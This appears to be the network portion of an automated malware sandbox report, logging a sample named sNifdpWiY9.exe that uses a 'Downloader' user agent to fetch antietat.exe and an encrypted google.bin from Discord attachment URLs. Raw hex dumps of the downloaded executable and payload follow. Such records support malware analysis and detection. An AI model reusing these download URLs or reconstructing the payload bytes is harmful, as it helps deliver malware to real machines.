                          Dec 5, 2024 11:41:03.270436049 CET1.1.1.1192.168.2.70x7f09No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                          Dec 5, 2024 11:41:03.270436049 CET1.1.1.1192.168.2.70x7f09No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                          Dec 5, 2024 11:41:03.270436049 CET1.1.1.1192.168.2.70x7f09No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                          Dec 5, 2024 11:41:03.270436049 CET1.1.1.1192.168.2.70x7f09No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                          Dec 5, 2024 11:41:03.270436049 CET1.1.1.1192.168.2.70x7f09No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                          • cdn.discordapp.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.749700162.159.134.2334434900C:\Users\user\Desktop\sNifdpWiY9.exe
                          TimestampBytes transferredDirectionData
                          2024-12-05 10:41:04 UTC250OUTGET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1
                          User-Agent: Downloader
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          2024-12-05 10:41:05 UTC1205INHTTP/1.1 200 OK
                          Date: Thu, 05 Dec 2024 10:41:04 GMT
                          Content-Type: application/x-msdos-program
                          Content-Length: 46592
                          Connection: close
                          CF-Ray: 8ed36bf53acd4380-EWR
                          CF-Cache-Status: HIT
                          Accept-Ranges: bytes, bytes
                          Age: 13424
                          Cache-Control: public, max-age=31536000
                          Content-Disposition: attachment; filename="antietat.exe"
                          ETag: "2eddba95f5818ef402bfe7fbaa0f6a18"
                          Expires: Fri, 05 Dec 2025 10:41:04 GMT
                          Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-goog-generation: 1733375623321737
                          x-goog-hash: crc32c=C+Z3jw==
                          x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA==
                          x-goog-metageneration: 1
                          x-goog-storage-class: STANDARD
                          x-goog-stored-content-encoding: identity
                          x-goog-stored-content-length: 46592
                          x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Set-Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; path=/; expires=Thu, 05-Dec-24 11:11:04 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                          2024-12-05 10:41:05 UTC513INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 52 74 6d 44 62 72 6c 42 7a 30 75 6c 4f 69 64 4c 44 33 33 6f 69 50 55 7a 25 32 46 4e 6a 4b 39 42 67 31 74 62 34 4a 59 67 67 61 4e 73 48 67 68 64 65 78 39 50 47 4c 6e 6c 6d 79 6a 30 6f 6b 53 50 6d 32 6f 33 5a 43 61 73 64 76 32 38 54 63 38 31 64 56 52 65 25 32 42 45 77 79 72 34 50 64 74 59 75 53 75 72 58 53 6c 53 5a 48 6a 4f 39 69 41 69 38 42 73 72 4a 76 54 58 52 4b 4f 37 43 6f 4e 4d 6a 41 6c 55 4e 41 54 64 65 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtmDbrlBz0ulOidLD33oiPUz%2FNjK9Bg1tb4JYggaNsHghdex9PGLnlmyj0okSPm2o3ZCasdv28Tc81dVRe%2BEwyr4PdtYuSurXSlSZHjO9iAi8BsrJvTXRKO7CoNMjAlUNATdeg%3D%3D"}],"group":"cf-nel","max_age":60
                          2024-12-05 10:41:05 UTC1020INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
                          2024-12-05 10:41:05 UTC1369INData Raw: 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 d5 9a 00 00 31 c9 c7 00 01 00 00 00 48 8b 05 d6 9a 00 00 c7 00 01 00 00 00 48 8b 05 d9 9a 00 00 c7 00 01 00 00 00 48 8b 05 2c 9a 00 00 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 66 48 8b 05 7f 9a 00 00 89 0d a5 cf 00 00 8b 00 85 c0 74 43 b9 02 00 00 00 e8 81 74 00 00 e8 14 73 00 00 48 8b 15 3d 9b 00 00 8b 12 89 10 e8 14 73 00 00 48 8b 15 0d 9b 00 00 8b 12 89 10 e8 c4 07 00 00 48 8b 05 ad 99 00 00 83 38 01 74 50 31 c0 48 83 c4 28 c3 90 b9 01 00 00 00 e8 3e 74 00 00 eb bb 0f 1f 40 00 0f b7 50 18 66 81 fa 0b 01 74 45 66 81 fa 0b 02 75 88 83 b8 84 00 00 00 0e 0f 86 7b ff ff ff 8b 90 f8 00 00 00 31 c9 85 d2 0f 95 c1 e9 69 ff ff ff 0f 1f 80 00 00 00 00 48 8b 0d
                          Data Ascii: ff.@H(H1HHH,f8MZuHcP<H8PEtfHtCtsH=sHH8tP1H(>t@PftEfu{1iH
                          2024-12-05 10:41:05 UTC1369INData Raw: 8b 4c 24 40 41 b8 01 00 00 00 48 89 74 24 20 ff 15 fe dc 00 00 85 c0 74 4c 8b 54 24 78 48 8b 84 24 90 00 00 00 48 8b 4c 24 40 89 10 ff 15 f9 dc 00 00 48 8b 4c 24 38 31 d2 ff 15 fc dc 00 00 90 48 83 c4 58 5b 5e c3 ff 15 0e dd 00 00 48 8d 0d 6f 8a 00 00 89 c2 e8 d0 12 00 00 b9 01 00 00 00 e8 96 6f 00 00 ff 15 f0 dc 00 00 48 8d 0d 29 8b 00 00 89 c2 e8 b2 12 00 00 48 8b 4c 24 40 ff 15 a7 dc 00 00 48 8b 4c 24 38 31 d2 ff 15 aa dc 00 00 b9 01 00 00 00 e8 60 6f 00 00 ff 15 ba dc 00 00 48 8d 0d bb 8a 00 00 89 c2 e8 7c 12 00 00 48 8b 4c 24 48 ff 15 69 dc 00 00 eb c8 ff 15 99 dc 00 00 48 8d 0d 6a 8a 00 00 89 c2 eb dd ff 15 88 dc 00 00 48 8d 0d 21 8a 00 00 89 c2 e8 4a 12 00 00 eb a1 0f 1f 84 00 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 48 89 ce 48 8d 0d cc 8a 00 00
                          Data Ascii: L$@AHt$ tLT$xH$HL$@HL$81HX[^HooH)HL$@HL$81`oH|HL$HiHjH!JATUWVSH HH
                          2024-12-05 10:41:05 UTC1369INData Raw: 48 89 cb 85 f6 0f 8e 17 01 00 00 48 8b 05 e8 c5 00 00 45 31 c9 48 83 c0 18 66 0f 1f 84 00 00 00 00 00 4c 8b 00 4c 39 c3 72 13 48 8b 50 08 8b 52 08 49 01 d0 4c 39 c3 0f 82 8a 00 00 00 41 83 c1 01 48 83 c0 28 41 39 f1 75 d8 48 89 d9 e8 60 0a 00 00 48 89 c7 48 85 c0 0f 84 e6 00 00 00 48 8b 05 95 c5 00 00 48 8d 1c b6 48 c1 e3 03 48 01 d8 48 89 78 20 c7 00 00 00 00 00 e8 73 0b 00 00 8b 57 0c 41 b8 30 00 00 00 48 8d 0c 10 48 8b 05 67 c5 00 00 48 8d 54 24 20 48 89 4c 18 18 ff 15 b7 d7 00 00 48 85 c0 0f 84 7d 00 00 00 8b 44 24 44 8d 50 fc 83 e2 fb 74 08 8d 50 c0 83 e2 bf 75 12 83 05 2f c5 00 00 01 48 83 c4 50 5b 5e 5f c3 0f 1f 00 83 f8 02 48 8b 4c 24 20 48 8b 54 24 38 41 b8 40 00 00 00 b8 04 00 00 00 44 0f 44 c0 48 03 1d 05 c5 00 00 48 89 4b 08 49 89 d9 48 89 53
                          Data Ascii: HHE1HfLL9rHPRIL9AH(A9uH`HHHHHHHx sWA0HHgHT$ HLH}D$DPtPu/HP[^_HL$ HT$8A@DDHHKIHS
                          2024-12-05 10:41:05 UTC1369INData Raw: 77 6b 48 8d 15 70 86 00 00 48 63 04 82 48 01 d0 ff e0 0f 1f 80 00 00 00 00 31 d2 b9 08 00 00 00 e8 94 65 00 00 48 83 f8 01 0f 84 3e 01 00 00 48 85 c0 0f 85 01 01 00 00 48 8b 05 8a c0 00 00 48 85 c0 74 45 48 89 d9 48 83 c4 20 5b 48 ff e0 66 2e 0f 1f 84 00 00 00 00 00 3d 05 00 00 c0 0f 84 a5 00 00 00 77 33 3d 02 00 00 80 75 cb b8 ff ff ff ff 48 83 c4 20 5b c3 90 f6 42 04 01 0f 85 67 ff ff ff eb e8 0f 1f 40 00 31 c0 48 83 c4 20 5b c3 0f 1f 84 00 00 00 00 00 3d 08 00 00 c0 74 cd 3d 1d 00 00 c0 75 91 31 d2 b9 04 00 00 00 e8 06 65 00 00 48 83 f8 01 0f 84 9c 00 00 00 48 85 c0 0f 84 72 ff ff ff b9 04 00 00 00 ff d0 eb 9e 66 2e 0f 1f 84 00 00 00 00 00 31 d2 b9 08 00 00 00 e8 d4 64 00 00 48 83 f8 01 0f 85 40 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 bb 64 00 00 e9
                          Data Ascii: wkHpHcH1eH>HHHtEHH [Hf.=w3=uH [Bg@1H [=t=u1eHHrf.1dH@d
                          2024-12-05 10:41:05 UTC1369INData Raw: 48 8b 15 09 85 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 41 0f b7 40 14 48 29 d1 49 8d 44 00 18 45 0f b7 40 06 66 45 85 c0 74 34 41 8d 50 ff 48 8d 14 92 4c 8d 4c d0 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 40 0c 4c 89 c2 4c 39 c1 72 08 03 50 08 48 39 d1 72 ac 48 83 c0 28 4c 39 c8 75 e3 31 c0 c3 48 8b 05 89 84 00 00 31 c9 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 09 89 c8 c3 66 0f 1f 44 00 00 66 81 78 18 0b 02 75 ef 0f b7 48 06 89 c8 c3 66 0f 1f 84 00 00 00 00 00 4c 8b 05 49 84 00 00 31 c0 66 41 81 38 4d 5a 75 0f 49 63 50 3c 4c 01 c2 81 3a 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 81 7a 18 0b 02 75 f0 0f b7 42 14 44 0f b7 42 06 48 8d 44 02 18 66
                          Data Ascii: H1f:MZuLcB<IA8PEtfAxuA@H)IDE@fEt4APHLL(f.D@LL9rPH9rH(L9u1H1f8MZuHcP<H8PEtfDfxuHfLI1fA8MZuIcP<L:PEtfzuBDBHDf
                          2024-12-05 10:41:05 UTC1369INData Raw: 00 00 00 00 0f 1f 00 0f b7 54 75 00 4d 89 e8 48 89 f9 e8 00 54 00 00 85 c0 0f 8e 95 00 00 00 83 e8 01 49 89 fe 4c 8d 7c 07 01 eb 18 0f 1f 00 48 63 53 24 88 0c 10 8b 43 24 83 c0 01 89 43 24 4d 39 fe 74 37 8b 53 08 49 83 c6 01 f6 c6 40 75 08 8b 43 24 39 43 28 7e e1 41 0f be 4e ff 48 8b 03 80 e6 20 74 ca 48 89 c2 e8 4a 5a 00 00 8b 43 24 83 c0 01 89 43 24 4d 39 fe 75 c9 48 83 c6 01 44 89 e0 29 f0 85 c0 0f 8f 7b ff ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0 7e 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 89 da b9 20 00 00 00 e8 83 fe ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0 7f e6 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 29 f0 89 43 0c f6 43 09 04 75 3a 83 e8 01 89 43 0c 0f 1f 40 00 48 89 da b9 20 00 00 00 e8 43 fe ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0
                          Data Ascii: TuMHTIL|HcS$C$C$M9t7SI@uC$9C(~ANH tHJZC$C$M9uHD){CPS~(ff.H CPSHH[^_]A\A]A^A_)CCu:C@H CCPS
                          2024-12-05 10:41:05 UTC1369INData Raw: f7 c7 00 40 00 00 75 08 8b 43 24 39 43 28 7e e1 81 e7 00 20 00 00 48 8b 13 74 cb b9 20 00 00 00 e8 39 55 00 00 8b 43 24 83 c0 01 89 43 24 41 83 ed 01 73 c9 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 84 00 00 00 00 00 66 83 7b 20 00 0f 84 fd fd ff ff b9 04 00 00 00 41 89 c2 41 b9 ab aa aa aa 4d 0f af d1 44 8b 4b 0c 49 c1 ea 21 44 01 d0 44 39 c8 41 0f 4c c1 48 98 48 83 c0 0f 48 83 e0 f0 e8 a2 f7 ff ff 48 29 c4 4c 8d 64 24 20 41 83 fd 6f 0f 85 df fd ff ff e9 e9 00 00 00 0f 1f 00 44 89 c0 80 e4 f7 89 43 08 45 85 f6 0f 8e 26 02 00 00 45 89 f7 4d 63 c7 41 83 ef 01 48 89 f1 ba 30 00 00 00 4d 63 ff 44 89 4d fc e8 d0 54 00 00 4a 8d 74 3e 01 44 8b 4d fc 4c 39 e6 0f 84 d6 00 00 00 48 89 f0 4c 29 e0 89 c2 44 39 c8 0f 8c dd 00 00 00 c7 43 0c ff ff ff
                          Data Ascii: @uC$9C(~ Ht 9UC$C$AsHe[^_A\A]A^A_]ff{ AAMDKI!DD9ALHHHH)Ld$ AoDCE&EMcAH0McDMTJt>DML9HL)D9C
                          2024-12-05 10:41:05 UTC1369INData Raw: 00 00 e8 46 50 00 00 4d 63 ff 4f 8d 6c 3d 01 4d 39 ec 0f 84 e6 00 00 00 85 f6 7e 43 4c 89 e8 4c 29 e0 29 c6 89 73 0c 85 f6 7e 34 f7 c7 c0 01 00 00 74 06 83 ee 01 89 73 0c 45 85 f6 79 12 89 f8 25 00 06 00 00 3d 00 02 00 00 0f 84 00 02 00 00 81 e7 00 04 00 00 0f 84 16 01 00 00 8b 7b 08 40 f6 c7 80 0f 84 ac 01 00 00 41 c6 45 00 2d 49 8d 75 01 49 39 f4 72 2a e9 1a 01 00 00 66 0f 1f 84 00 00 00 00 00 48 63 43 24 88 0c 02 8b 43 24 83 c0 01 89 43 24 49 39 f4 0f 84 f8 00 00 00 8b 7b 08 48 83 ee 01 f7 c7 00 40 00 00 75 08 8b 43 24 39 43 28 7e da 81 e7 00 20 00 00 0f be 0e 48 8b 13 74 c2 e8 3d 4f 00 00 8b 43 24 eb c2 0f 1f 84 00 00 00 00 00 89 c2 41 b8 ab aa aa aa 49 0f af d0 48 c1 ea 21 01 d0 e9 27 fe ff ff 66 0f 1f 84 00 00 00 00 00 4d 39 ec 0f 85 1a ff ff ff 41
                          Data Ascii: FPMcOl=M9~CLL))s~4tsEy%={@AE-IuI9r*fHcC$C$C$I9{H@uC$9C(~ Ht=OC$AIH!'fM9A


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.749701162.159.134.2334434900C:\Users\user\Desktop\sNifdpWiY9.exe
                          TimestampBytes transferredDirectionData
                          2024-12-05 10:41:06 UTC500OUTGET /attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b& HTTP/1.1
                          User-Agent: Downloader
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; _cfuvid=bU7nF5VnNYVA.5nawcWS8uqB9Y.KCne1Dnja3l1cffI-1733395264866-0.0.1.1-604800000
                          2024-12-05 10:41:07 UTC1298INHTTP/1.1 200 OK
                          Date: Thu, 05 Dec 2024 10:41:06 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 210624
                          Connection: close
                          CF-Ray: 8ed36c0249a18c65-EWR
                          CF-Cache-Status: HIT
                          Accept-Ranges: bytes, bytes
                          Age: 9445
                          Cache-Control: public, max-age=31536000
                          Content-Disposition: attachment; filename="google.bin"
                          ETag: "3ac321648d8ba5e4085f3aea6304fbba"
                          Expires: Fri, 05 Dec 2025 10:41:06 GMT
                          Last-Modified: Thu, 05 Dec 2024 04:24:00 GMT
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-goog-generation: 1733372640566234
                          x-goog-hash: crc32c=pCQb3Q==
                          x-goog-hash: md5=OsMhZI2LpeQIXzrqYwT7ug==
                          x-goog-metageneration: 1
                          x-goog-storage-class: STANDARD
                          x-goog-stored-content-encoding: identity
                          x-goog-stored-content-length: 210624
                          x-guploader-uploadid: AFiumC49cRuhl-V1NKnfqZkYGrjRzu4zovf5xeHYiLwz--tY3BhV9oOWQnLGjuJcB_YGRqg_asphB5hJSQ
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Gp9EFuTfDpp0%2FGat0ZWWycWF9EiW8vC%2F4Jh%2BwVfK1e9jinLWR%2FobMn%2BQR23bCNiEgw8hke8%2FAS8A5eKK8%2FwVugfY2AyOa6BN02MGPDR%2F6vSn6OWsBPz7McdRVCJy0B0nWbFhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          2024-12-05 10:41:07 UTC71INData Raw: 64 a0 e2 3b 4e e7 c2 b0 ee 05 db c2 65 38 b1 f7 e8 61 e3 b7 82 88 1b 6a bb 77 3a 1a 46 1d de 76 7f c4 c3 2c 68 75 ed 17 33 4b 57 26 88 3b 20 d3 1f fc ae 81 6e 74 cb 57 68 26 3f b7 ec f2 d2 1a a2 7e df b2 c8 cf 8a
                          Data Ascii: d;Ne8ajw:Fv,hu3KW&; ntWh&?~
                          2024-12-05 10:41:07 UTC1369INData Raw: 6e 0d 32 c4 b7 6e 3f 3b 60 a0 5a 60 94 b1 06 11 3f d0 9b b2 a7 71 e9 04 af 1c 00 6d a2 a1 d1 87 3b 5d dc 52 ee 46 e2 de 40 61 c0 49 3e 35 06 05 d3 e7 8f ec e2 c8 57 22 7b 9d b2 aa 6f 1e 09 01 42 06 92 2b 9f 1c 91 08 fd 1f 13 27 ae d0 6c 5a aa 18 89 09 97 ef 81 d4 d1 53 3d 40 5a 59 92 65 d1 26 76 08 72 f5 56 a4 77 38 50 75 d6 62 11 06 65 4e 37 f7 d1 e8 23 b7 71 ab d5 94 e5 db 25 31 9f 95 69 a0 3a 86 91 2d a4 f0 55 60 59 ee e8 80 43 d1 02 31 a2 e1 c8 30 c6 b6 9d f3 4a 4a 29 93 6c 50 9a 84 34 fc 35 74 32 27 f2 80 19 64 6e b7 9c 82 56 7a 2f b1 f8 81 64 42 cc 77 85 21 4f 83 20 12 34 1c c2 89 4e a9 7a 35 81 a6 35 df ce 43 73 ab 64 d4 a9 bc c0 f3 3f 08 60 6c 4f db f7 92 09 85 87 0e 7c 93 6b 4d f6 4c 3a 8f 38 7b 02 f0 c5 8d e2 f2 2f 27 a2 4a 7b fb 09 2d 35 e7 6f
                          Data Ascii: n2n?;`Z`?qm;]RF@aI>5W"{oB+'lZS=@ZYe&vrVw8PubeN7#q%1i:-U`YC10JJ)lP45t2'dnVz/dBw!O 4Nz55Csd?`lO|kML:8{/'J{-5o
                          2024-12-05 10:41:07 UTC1369INData Raw: ba 67 91 20 72 96 ca 69 9f 0b f6 28 82 ce 5f bb 89 1b 2e e2 86 be 54 d6 d3 a6 06 77 2c 63 c2 69 1f 65 cb 5a e6 55 39 36 f4 9f 05 d0 8a ca 79 d6 75 2a 5a 60 f5 4f ee 28 16 05 f8 7d 5d e0 68 26 03 42 54 a4 ce c6 f1 98 0a a7 b7 3e fb f1 68 a6 10 12 d4 40 f2 bf c0 f2 47 2d 7b ba 0b ec af 51 f8 7e fa 47 e9 bf f5 4e 6d c3 40 54 9e 5b 52 51 75 28 3e 6c 98 fa e5 10 00 3e 43 9f 62 42 eb 94 ab 13 2a 3f 2c c7 08 9c 2e 42 9b f4 11 4e 89 63 d5 ff 73 a2 62 98 d3 18 82 c8 c5 ca c2 ca a9 1b 61 d0 56 1d 81 77 a4 2a 09 3f 7e 4f f5 57 45 c8 8d 9e f2 3f 96 1d a8 c1 07 e2 ba 9a ba 2d 4f 86 74 10 fa 24 80 92 33 2f eb 06 0c 6b fa 60 58 e6 30 97 b5 77 16 3b 00 15 b9 ca 78 5f c6 68 8b 9a 66 4f 30 e1 f5 6e 32 8d 21 89 be 97 33 35 8d 78 d9 09 be 4a 60 c3 af cb 97 ac c8 bd a0 8d a7
                          Data Ascii: g ri(_.Tw,cieZU96yu*Z`O(}]h&BT>h@G-{Q~GNm@T[RQu(>l>CbB*?,.BNcsbaVw*?~OWE?-Ot$3/k`X0w;x_hfO0n2!35xJ`
                          2024-12-05 10:41:07 UTC195INData Raw: 4c be 0d 44 4d a6 52 cd c2 95 49 6b e6 db bc d1 37 af c8 1b 11 6c 9b 77 1d aa 8e 7c 57 85 2a 72 b8 41 b0 3e 35 25 54 34 8a a1 f5 3f 79 a9 24 13 ff 93 c5 2c d3 99 4e 1c 97 4e e2 48 3b 42 2c e4 a9 0f 9b 28 5b 98 52 77 2a b5 c1 82 3d 71 d5 46 bc 09 1e a5 0f 3f 32 21 8b 1c 3e 7f c6 b4 39 70 5b 12 f8 3c 94 a6 76 e1 63 35 45 08 3a 64 d5 d2 fa a1 21 08 8e 58 1f 8d d4 56 86 dc 20 eb e5 c0 c0 38 f8 d4 a3 fc 29 6f cb d8 43 8f 60 33 be 4b 7e 3b e2 42 b5 b9 39 ea 7a 1f 48 95 3e 42 20 77 25 bd 59 fd 94 2b d5 df 59 1c 27 02 02 8a b3 09 b3 18 ba cb 6b 3e 57 82 bb 58 11 d3 96 46 9c 3d d9 fb 2a
                          Data Ascii: LDMRIk7lw|W*rA>5%T4?y$,NNH;B,([Rw*=qF?2!>9p[<vc5E:d!XV 8)oC`3K~;B9zH>B w%Y+Y'k>WXF=*
                          2024-12-05 10:41:07 UTC1369INData Raw: f3 34 64 1a 1e ef 38 44 92 95 de 6f 7f 71 cf da 4d 9d 07 d4 2e 03 37 9e f5 2e b9 a6 37 cf e3 40 21 4e 5e 63 a5 8b 8f eb af aa 75 a4 96 d7 52 22 20 85 58 b6 06 46 7c 31 3c d2 a0 fe ab 3f 43 80 de c1 f2 3d e7 01 2f ca 80 d6 14 e9 e9 3a 23 a2 45 8a b7 fe ca 23 da 7e a0 58 23 aa 1c fe 41 1e ef 8d f7 c7 71 2d 20 53 5b 03 96 ae 73 2e 24 64 2e 34 3e f6 73 f8 7d bb 78 ae 6c e6 87 a1 2c 1f b4 5a 7d 18 98 5e da d2 1a 0c c2 cd 85 66 71 63 70 df c9 3c 2c 32 6a f5 17 8c 30 f6 8d 81 4c e1 e7 fa 2f cf ea 4b a0 69 f0 da 41 06 bc 6e eb 7f 11 02 b9 82 07 8d 8b 94 63 bd f7 50 56 aa ee 58 0c fe 43 4f f3 a9 b8 b6 32 cc 0f b7 74 96 24 cc 62 e7 0c e5 8d 12 c0 16 ae 73 cc 14 a9 30 12 d1 b9 d6 99 6c b5 62 ff 7c 88 a3 dd a7 c4 6e 64 05 3e 73 78 5b 25 96 aa e8 e2 a1 13 63 d7 e4 7d
                          Data Ascii: 4d8DoqM.7.7@!N^cuR" XF|1<?C=/:#E#~X#Aq- S[s.$d.4>s}xl,Z}^fqcp<,2j0L/KiAncPVXCO2t$bs0lb|nd>sx[%c}
                          2024-12-05 10:41:07 UTC1369INData Raw: 18 b2 c1 89 0d db 7e c7 1f 33 ff bb 40 15 bd 48 b7 7b a2 11 f6 15 6b e7 ba 0a c7 11 61 7e b7 88 63 c2 56 fc e8 1a 5f 2d 8b f5 77 e7 52 2b 9c 4e e1 c3 22 2c 15 db 07 14 48 62 8f 37 c4 f3 ab 46 29 27 03 a6 74 e3 72 48 94 1a 41 30 24 ac 31 d4 a1 e0 1f e6 35 31 06 f5 c2 2d b0 94 00 07 af b9 ce c4 2d ee 9a 5b 72 db 54 98 5d bd 1b c4 82 5b 2f d5 7a 11 73 b7 21 bb 76 00 95 2a da 2c 1e 99 80 05 4e e7 45 57 e7 7f e0 ce a8 a4 d2 fb 7b 6d 95 68 44 2b 88 04 fe 76 3b 55 52 63 5c 7f b5 66 99 d5 f9 d5 5f 9c 88 08 c1 fb 1b 87 ee af 8a c2 7d a5 a7 aa 9a aa e0 49 70 ec e0 be b1 ce cf 97 3e ca 02 ee e3 d7 e3 d1 64 49 08 a7 c0 a2 01 23 5e 50 15 6d 33 9f ef ce 2c 98 08 61 f1 8b 95 fc 4c f9 24 8c 36 5c 1f 35 9f 6d ff 07 e1 87 90 4d c7 84 e0 71 c3 2a d6 5d 52 40 c6 72 08 83 0e
                          Data Ascii: ~3@H{ka~cV_-wR+N",Hb7F)'trHA0$151--[rT][/zs!v*,NEW{mhD+v;URc\f_}Ip>dI#^Pm3,aL$6\5mMq*]R@r
                          2024-12-05 10:41:07 UTC1369INData Raw: 13 1f 95 c9 11 39 24 d8 47 ce c2 63 da c9 a4 21 95 71 79 29 e7 8d e8 9e 26 2d e0 31 e1 16 83 a5 26 ca 3a 15 11 6a 11 ff d3 9b c9 63 3b 0b 0a 7e a3 a8 27 e8 8e 66 71 5c d3 06 a7 19 e0 42 ee 34 cd 63 31 06 0d 7f e1 7d 20 84 a7 3b 58 ef c5 a7 ec 01 82 9c c1 93 3b ff 22 aa 2e d7 62 54 3e 43 1e fe 8d be 38 cb dc 82 b4 c2 0b dd a4 36 14 6f 59 ec fa e7 0c ea 37 be 25 bb 4c 2e d4 ff 30 fa 16 71 b2 c4 96 fa 82 00 85 e7 3b 59 ad dc 77 75 30 63 ef 95 db 38 05 ed b8 c4 31 15 d2 00 ce b4 b7 1c 28 a7 08 8a d2 2e f4 ac 9d 4d 8d f6 ab 83 57 7d 9a 93 5a 7c 39 08 51 9c df 17 16 41 ad b7 e6 eb b4 19 50 d9 09 2b 59 61 29 29 07 95 22 eb 40 77 a8 da 10 c8 5c a9 59 0b e6 7d 24 76 c1 6b ff 02 1a 2b c7 a4 95 80 2b cc b7 97 0f 97 f6 0a 99 af 0f 01 0c 4a 7b 10 37 68 51 03 0d ce 60
                          Data Ascii: 9$Gc!qy)&-1&:jc;~'fq\B4c1} ;X;".bT>C86oY7%L.0q;Ywu0c81(.MW}Z|9QAP+Ya))"@w\Y}$vk++J{7hQ`
